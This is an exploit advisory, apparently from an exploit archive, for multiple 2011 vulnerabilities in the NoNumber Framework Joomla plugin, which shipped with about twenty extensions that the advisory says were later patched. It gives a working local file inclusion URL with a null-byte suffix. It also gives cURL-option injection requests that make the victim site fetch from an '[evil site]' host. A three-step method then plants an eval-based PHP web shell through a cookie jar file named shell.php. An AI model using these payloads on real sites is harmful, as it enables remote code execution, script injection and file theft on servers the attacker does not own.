71 lines
No EOL
1.7 KiB
Text
71 lines
No EOL
1.7 KiB
Text
# Exploit Title: NoNumber Framework Joomla! Plugin Multiple Vulnerabilities
|
|
# Discovery Date: 10 October 2011
|
|
# Reported Date: 11 October 2011
|
|
# Patch Date: 17 October 2011
|
|
# Release Date: 17 October 2011
|
|
# Author: jdc
|
|
# Software Link: http://nonumber.nl
|
|
|
|
The nnframework plugin by NoNumber! contains multiple vulnerabilities. This plugin is shipped with all NoNumber extensions:
|
|
|
|
* Advanced Module Manager
|
|
* AdminBar Docker
|
|
* Add to Menu
|
|
* Articles Anywhere
|
|
* What? Nothing!
|
|
* Tooltips
|
|
* Tabber
|
|
* Sourcerer
|
|
* Slider
|
|
* Timed Styles
|
|
* Modules Anywhere
|
|
* Modalizer
|
|
* ReReplacer
|
|
* Snippets
|
|
* DB Replacer
|
|
* CustoMenu
|
|
* Content Templater
|
|
* CDN for Joomla!
|
|
* Cache Cleaner
|
|
* Better Preview
|
|
|
|
All vulnerable extensions have been patched as of 17 October 2011.
|
|
|
|
|
|
|
|
Local File Inclusion:
|
|
---------------------
|
|
|
|
index.php?nn_qp=1&file=[LFI]%00.inc.php
|
|
|
|
NOTE: the ending ".inc.php" is required.
|
|
|
|
|
|
|
|
Open Proxy/Open cURL/Shell Upload
|
|
---------------------------------
|
|
|
|
Using the following data structure, it is possible to pass arguments directly into cURL:
|
|
|
|
index.php
|
|
?nn_qp=1
|
|
&url=[REMOTE HOST]
|
|
&url_options[CURLOPT_POSTDATA]=[post data]
|
|
|
|
Whatever the plugin loads via cURL gets written out as data under the domain of the victim site.
|
|
This allows for REMOTE HOST to inject javascript that runs in the context of the victim domain.
|
|
It is also possible to gain remote access:
|
|
|
|
1. Set up a remote page that sets the following cookie:
|
|
|
|
<?eval(array_pop($_POST))?>=1
|
|
|
|
2. Force victim site to write a cookie file:
|
|
|
|
index.php
|
|
?nn_qp=1
|
|
&url=http://[evil site]
|
|
&url_options[CURLOPT_COOKIEJAR]=shell.php
|
|
&url_options[CURLOPT_COOKIEFILE]=shell.php
|
|
|
|
3. POST a single variable containing REAL shellcode to http://[victim]/shell.php |